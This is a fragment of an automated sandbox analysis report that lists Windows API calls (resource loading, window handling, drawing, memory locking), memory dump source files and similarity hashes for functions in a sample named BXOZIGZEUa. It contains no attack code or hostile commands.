                                                                  • API String ID: 1001276555-2470269259
                                                                  • Opcode ID: 8d04684ba1bbf948276adf21b2482bd2ab81c40a3c8a75238299b5b32c75554c
                                                                  • Instruction ID: c7bfdb22bc4269d707165c44156ead98374b78a7419a98a0491e6286a371029d
                                                                  • Opcode Fuzzy Hash: 8d04684ba1bbf948276adf21b2482bd2ab81c40a3c8a75238299b5b32c75554c
                                                                  • Instruction Fuzzy Hash: 4711C430E10741BFEF1B9F25ED857593BE8BB01B18F90011AE48EC22A1DB74D914CB80
                                                                  APIs
                                                                  • FindResourceW.KERNEL32(?,?,76436BA0,00000000,TR/,?,002379C6,?,?,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014), ref: 00235B5F
                                                                  • LoadResource.KERNEL32(?,00000000,?,002379C6,?,?,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014,0028FFC9,00000004,0028A9EA), ref: 00235B75
                                                                  • LockResource.KERNEL32(00000000,?,?,002379C6,?,?,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014,0028FFC9,00000004,0028A9EA), ref: 00235B84
                                                                  • FreeResource.KERNEL32(?,00000000,00000000,?,?,002379C6,?,?,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014,0028FFC9), ref: 00235B95
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,002379C6,?,?,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014,0028FFC9,00000004), ref: 00235BA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeLoadLockSizeof
                                                                  • String ID: TR/
                                                                  • API String ID: 4159136517-3081264625
                                                                  • Opcode ID: e53f4d88804519746e35956bf37c0b47cc24b82a74243802db97f57e5662802e
                                                                  • Instruction ID: d9ff8484aa72701d6f891b5aacd73d80a386721f83d4dd6f22a5207f5e4b2d2d
                                                                  • Opcode Fuzzy Hash: e53f4d88804519746e35956bf37c0b47cc24b82a74243802db97f57e5662802e
                                                                  • Instruction Fuzzy Hash: EC01D4B6511966BF8B115FA1AC48C5FBBADEF953A4B008025FD09A7210DF30CD10CBA0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 001C9201
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 001C921E
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 001C9228
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Strings
                                                                  • RegisterApplicationRestart, xrefs: 001C9218
                                                                  • KERNEL32.DLL, xrefs: 001C91FC
                                                                  • RegisterApplicationRecoveryCallback, xrefs: 001C9220
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                                                  • String ID: KERNEL32.DLL$RegisterApplicationRecoveryCallback$RegisterApplicationRestart
                                                                  • API String ID: 417325364-723216104
                                                                  • Opcode ID: 3bf0294891b66bc30070c6a8c07e43505060d42ed9a7eed79ef87cbf93dcdd09
                                                                  • Instruction ID: 9be0596b0e1251fb06bdcbe69af09d854708912940813dbd6f7e9ef39f4b535a
                                                                  • Opcode Fuzzy Hash: 3bf0294891b66bc30070c6a8c07e43505060d42ed9a7eed79ef87cbf93dcdd09
                                                                  • Instruction Fuzzy Hash: A9F0683258035A7B4F225EA69C48E5B3F6DDFE5BA0744002AFD8492110EB71CD719691
                                                                  APIs
                                                                  • GetSysColor.USER32(0000000F), ref: 001D51C5
                                                                  • GetSysColor.USER32(00000010), ref: 001D51CC
                                                                  • GetSysColor.USER32(00000014), ref: 001D51D3
                                                                  • GetSysColor.USER32(00000012), ref: 001D51DA
                                                                  • GetSysColor.USER32(00000006), ref: 001D51E1
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 001D51EE
                                                                  • GetSysColorBrush.USER32(00000006), ref: 001D51F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Brush
                                                                  • String ID:
                                                                  • API String ID: 2798902688-0
                                                                  • Opcode ID: 9199d09cd3b36bbeacee9b8e179c1a29d57a5b0766996b738adfa0795bec0510
                                                                  • Instruction ID: 1b404b6ba6b61d644b74400c07d02d4ff1db3e80b9d0be658db8787dbb3f8f99
                                                                  • Opcode Fuzzy Hash: 9199d09cd3b36bbeacee9b8e179c1a29d57a5b0766996b738adfa0795bec0510
                                                                  • Instruction Fuzzy Hash: 98F0FE719407485BD730BB725D49B47BAD1FFC4710F06092ED2858B990DAB5E441DF40
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 001FEC89
                                                                    • Part of subcall function 001DCC18: GetWindowLongW.USER32(?,000000EC), ref: 001DCC23
                                                                  • GetWindowRect.USER32(?,?), ref: 001FED84
                                                                  • GetParent.USER32(?), ref: 001FED91
                                                                  • GetParent.USER32(?), ref: 001FEDAB
                                                                  • OffsetRect.USER32(?,?,?), ref: 001FEE78
                                                                  • OffsetRect.USER32(?,?,?), ref: 001FEE84
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$OffsetParent$Long
                                                                  • String ID:
                                                                  • API String ID: 2171155602-0
                                                                  • Opcode ID: cb24c19af50942b153001680639adfa984b77824efea9565cb2c2f9db54f641d
                                                                  • Instruction ID: 8838dde728c6a4f15818466d2d9b6e81f7efa4ab175d069e0012048002e1b189
                                                                  • Opcode Fuzzy Hash: cb24c19af50942b153001680639adfa984b77824efea9565cb2c2f9db54f641d
                                                                  • Instruction Fuzzy Hash: C4919075D00209EFCF15DFA8D9889EEBBF5BF48300F24456AEA45A7261DB346A41CF60
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 0022F279
                                                                  • GlobalLock.KERNEL32(?), ref: 0022F35F
                                                                  • CreateDialogIndirectParamW.USER32(00000000,?,458DFFFB,0022EC59,00000000), ref: 0022F38E
                                                                  • DestroyWindow.USER32(00000000), ref: 0022F408
                                                                  • GlobalUnlock.KERNEL32(?), ref: 0022F418
                                                                  • GlobalFree.KERNEL32(?), ref: 0022F421
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                                                                  • String ID:
                                                                  • API String ID: 3003189058-0
                                                                  • Opcode ID: 81ce42852eeb659a39ed1959a03e64fa159f843171769da8446f920c329b37cc
                                                                  • Instruction ID: 62f1ffd063f432e57b45a14239e57c80766169a7d1e36372ff36fa25c1eca75b
                                                                  • Opcode Fuzzy Hash: 81ce42852eeb659a39ed1959a03e64fa159f843171769da8446f920c329b37cc
                                                                  • Instruction Fuzzy Hash: 0151AC3191028AEFCF00EFE4E985AAEBBB5AF14304F25057EF542A7291CF709A51CB51
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 0021CEB9
                                                                  • GetTopWindow.USER32(?), ref: 0021CF24
                                                                  • GetWindow.USER32(?,00000002), ref: 0021CF42
                                                                  • IsWindow.USER32(?), ref: 0021CF61
                                                                  • GetParent.USER32(?), ref: 0021CF6C
                                                                  • DestroyWindow.USER32(?), ref: 0021CF78
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$H_prolog3$DestroyException@8ParentThrow
                                                                  • String ID:
                                                                  • API String ID: 3096848108-0
                                                                  • Opcode ID: 2216db2b90e54c17255570fd0696e4c4bd2e95ba71ec54c9712047fe5ed964a6
                                                                  • Instruction ID: 5020bb4da944d1e9451266014fd8b93624e10bb01e3b70e76eed0e4bbae020e7
                                                                  • Opcode Fuzzy Hash: 2216db2b90e54c17255570fd0696e4c4bd2e95ba71ec54c9712047fe5ed964a6
                                                                  • Instruction Fuzzy Hash: A741DF359602158FCF22AFA4C8856EDFBF2BF68300F35415AE8957B251CB309D918B90
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 0020CD09
                                                                  • OffsetRect.USER32(?,?,?), ref: 0020CD27
                                                                  • SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 0020CD34
                                                                  • IsWindowVisible.USER32(?), ref: 0020CD3D
                                                                  • SendMessageW.USER32(00000014,0000000B,00000001,00000000), ref: 0020CDB0
                                                                  • RedrawWindow.USER32(00000105,00000000,00000000,00000105), ref: 0020CDC0
                                                                    • Part of subcall function 001DCDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,001D8A00,?,001D8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 001DCE0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageRectSend$OffsetRedrawVisible
                                                                  • String ID:
                                                                  • API String ID: 2707749077-0
                                                                  • Opcode ID: 1475cbf73ad4bd918f5f86e6c9fd81892071da3fd328d2b3043b84736a1ecbce
                                                                  • Instruction ID: 8a960dd6f25f42c242d7d00dcfdddbce664e3e805f52d726af00a84e38458186
                                                                  • Opcode Fuzzy Hash: 1475cbf73ad4bd918f5f86e6c9fd81892071da3fd328d2b3043b84736a1ecbce
                                                                  • Instruction Fuzzy Hash: 95312FB1910209BFDB11DFA4CD89EBFBBBDFB48300F100929B556A6291DB70AD109F60
                                                                  APIs
                                                                  • PatBlt.GDI32(00000000,00000000,001F80B7,000000C6,00FF0062,00000000), ref: 00232D32
                                                                  • SetBkColor.GDI32(00F0F0F0), ref: 00232D55
                                                                  • BitBlt.GDI32(00000000,00000000,001F80B9,000000C8,00000000,00000000,00CC0020), ref: 00232D83
                                                                  • SetBkColor.GDI32 ref: 00232D96
                                                                  • BitBlt.GDI32(00000000,00000000,001F80B9,000000C8,00000000,00000000,00EE0086), ref: 00232DBE
                                                                  • BitBlt.GDI32(00000000,00000001,00000001,001F80BA,000000C9,00000000,00000000,00000000,008800C6), ref: 00232DE1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Color
                                                                  • String ID:
                                                                  • API String ID: 2811717613-0
                                                                  • Opcode ID: c41a42ae7079ee21f3d634d3b4157bbf9dc5369e53b4df1e5d1c53496d8ac943
                                                                  • Instruction ID: e218a6cfb5cd18d4c6c2798420f5cecc171ca6d1abeeb94251d52b9844461d0f
                                                                  • Opcode Fuzzy Hash: c41a42ae7079ee21f3d634d3b4157bbf9dc5369e53b4df1e5d1c53496d8ac943
                                                                  • Instruction Fuzzy Hash: A3215CB2200608FFE72A8F55EDC6D77B7ADEB48358F004519F24686170C6B1AC549F20
                                                                  APIs
                                                                  • PtInRect.USER32(?,?,?), ref: 0020DFDB
                                                                  • ReleaseCapture.USER32 ref: 0020DFE9
                                                                  • PtInRect.USER32(?,?,?), ref: 0020E03B
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0020E089
                                                                  • SetTimer.USER32(?,00000002,00000050,00000000), ref: 0020E0AB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$CaptureInvalidateReleaseTimer
                                                                  • String ID:
                                                                  • API String ID: 2903485716-0
                                                                  • Opcode ID: 72808eae87f1258628a7fbe98ab06b87ae974f0678f86c036bce549a5697f18f
                                                                  • Instruction ID: d4ba77c44aed3a427ff1e65c3c90c4e0eb7ce78aa552fa8e890990259bef3079
                                                                  • Opcode Fuzzy Hash: 72808eae87f1258628a7fbe98ab06b87ae974f0678f86c036bce549a5697f18f
                                                                  • Instruction Fuzzy Hash: 22216F32250747DBCF314F20CC88FAA77B6FF44391F150829F5AAA61D1DBB199919B90
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000002,?,?,?,?,?,00235BB2,00000000,00000000,?,?,002379C6,?,?,00000084,00237D9A), ref: 00235A79
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00235A91
                                                                  • _memmove.LIBCMT ref: 00235A9E
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000,?), ref: 00235AAD
                                                                  • EnterCriticalSection.KERNEL32(00336BF4,00000000), ref: 00235AC6
                                                                  • LeaveCriticalSection.KERNEL32(00336BF4), ref: 00235B2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Global$CriticalSection$AllocCreateEnterLeaveLockStream_memmove
                                                                  • String ID:
                                                                  • API String ID: 861836607-0
                                                                  • Opcode ID: b95774e080548eaa657a4d24e605d960734d1cf063ab25a9838aa62628583381
                                                                  • Instruction ID: 44551eccad8631c645a3e07dac7b148ba35a2093ffa9e2d7191b12e51be880b8
                                                                  • Opcode Fuzzy Hash: b95774e080548eaa657a4d24e605d960734d1cf063ab25a9838aa62628583381
                                                                  • Instruction Fuzzy Hash: 0F21A1B5610616BFCB11AF61ECD9B6E7BACEB14745F004129F809DA251EF30DD10DB60
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00215F2C
                                                                  • GetDesktopWindow.USER32 ref: 00215F3A
                                                                    • Part of subcall function 001D0431: __EH_prolog3.LIBCMT ref: 001D0438
                                                                    • Part of subcall function 001D0431: GetWindowDC.USER32(00000000,00000004,001CE19D,00000000,?,?,002F5254), ref: 001D0464
                                                                  • SetRectEmpty.USER32(?), ref: 00215F71
                                                                  • SetRectEmpty.USER32(?), ref: 00215F83
                                                                  • CopyRect.USER32(?,?), ref: 00215F8E
                                                                  • CopyRect.USER32(?,?), ref: 00215FAA
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$CopyEmptyWindow$DesktopH_prolog3H_prolog3_
                                                                  • String ID:
                                                                  • API String ID: 2526268198-0
                                                                  • Opcode ID: 361ddd99c328192b5a11df488925e937090012c21dddba5d36505a59ff0661a0
                                                                  • Instruction ID: 169e632a0b43e1bce9ddf71c030c2485939337a8ed8b2bc45e0de9665c75e06f
                                                                  • Opcode Fuzzy Hash: 361ddd99c328192b5a11df488925e937090012c21dddba5d36505a59ff0661a0
                                                                  • Instruction Fuzzy Hash: 612195B2C1061D9ACF01DFD4DC849EEBBB9BF19305F54442AEA09BB150D7756A06CB60
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 001D4CE1
                                                                  • GetParent.USER32(?), ref: 001D4CEF
                                                                  • GetParent.USER32(?), ref: 001D4D02
                                                                  • GetLastActivePopup.USER32(?), ref: 001D4D13
                                                                  • IsWindowEnabled.USER32(?), ref: 001D4D27
                                                                  • EnableWindow.USER32(?,00000000), ref: 001D4D3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                  • String ID:
                                                                  • API String ID: 670545878-0
                                                                  • Opcode ID: d2c1a40b11d1601c949cdcc1d94fa9a813d2befaa01dcf7e5375f2089ff64dde
                                                                  • Instruction ID: 3d72bb6fd46f93923429bd726551b545cc35cfbbf3bfcc4458ff4a1d4c8ad898
                                                                  • Opcode Fuzzy Hash: d2c1a40b11d1601c949cdcc1d94fa9a813d2befaa01dcf7e5375f2089ff64dde
                                                                  • Instruction Fuzzy Hash: 7A11EC33643A3157DB311B9D9C84B6AB39D9F64B61F164157ED48EB304CB34CC0082E1
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 002066D3
                                                                  • GetWindow.USER32(00000000), ref: 002066DA
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00206716
                                                                  • ShowWindow.USER32(00000000,00000000,?,?,?,?,00207F19,00000001), ref: 00206731
                                                                  • ShowWindow.USER32(00000000,00000004,?,?,?,?,?,?,?,?,?,?,?,00207F19,00000001), ref: 00206755
                                                                  • GetWindow.USER32(00000000,00000002), ref: 0020675E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$DesktopLong
                                                                  • String ID:
                                                                  • API String ID: 3178490500-0
                                                                  • Opcode ID: 91c233afbab342a3475de1643787a91e09f28b41c74434183681af6c356f277e
